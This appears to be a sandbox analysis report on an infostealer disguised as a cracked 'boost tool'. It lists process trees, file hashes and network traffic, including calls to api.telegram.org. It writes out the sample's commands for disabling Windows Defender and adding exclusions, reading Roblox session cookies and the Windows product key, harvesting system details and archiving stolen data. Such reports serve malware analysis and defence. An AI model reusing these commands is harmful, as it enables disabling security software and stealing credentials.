PID 1404 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1740 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1740 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe

bound.exe

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkksongd\nkksongd.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2093.tmp" "c:\Users\Admin\AppData\Local\Temp\nkksongd\CSCE42061967AF0434EBFA9CAAE41F44C73.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1368"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1368

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1956

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5072

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 556"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 556

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4884"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4884

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1580"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1580

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\AxPxY.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\AxPxY.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 blank-jltvu.in udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31002\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI31002\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/1404-26-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31002\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI31002\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/1404-50-0x00007FF94DC90000-0x00007FF94DC9F000-memory.dmp

memory/1404-49-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI31002\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI31002\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI31002\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI31002\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

memory/1404-56-0x00007FF951300000-0x00007FF95132D000-memory.dmp

memory/1404-62-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-61-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/1404-58-0x00007FF9512E0000-0x00007FF9512F9000-memory.dmp

memory/1404-66-0x00007FF94B430000-0x00007FF94B43D000-memory.dmp

memory/1404-65-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-73-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-74-0x00000278A0EB0000-0x00000278A13D0000-memory.dmp

memory/1404-72-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-71-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-76-0x00007FF94ABC0000-0x00007FF94ABD4000-memory.dmp

memory/1404-78-0x00007FF949FD0000-0x00007FF949FDD000-memory.dmp

memory/1404-81-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pha25yyv.gq5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/940-82-0x000001C3E8920000-0x000001C3E8942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 84aede3aa04bb514b90dcb124d948e1f
SHA1 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17
SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da
SHA512 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a

memory/1404-103-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

memory/3264-111-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-118-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-121-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-119-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-120-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-122-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-123-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe

MD5 5a796657b6f3717a1d30cd47d29f776a
SHA1 2d87d2b839845709d122d9464b77bb5c25d410f9
SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
SHA512 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
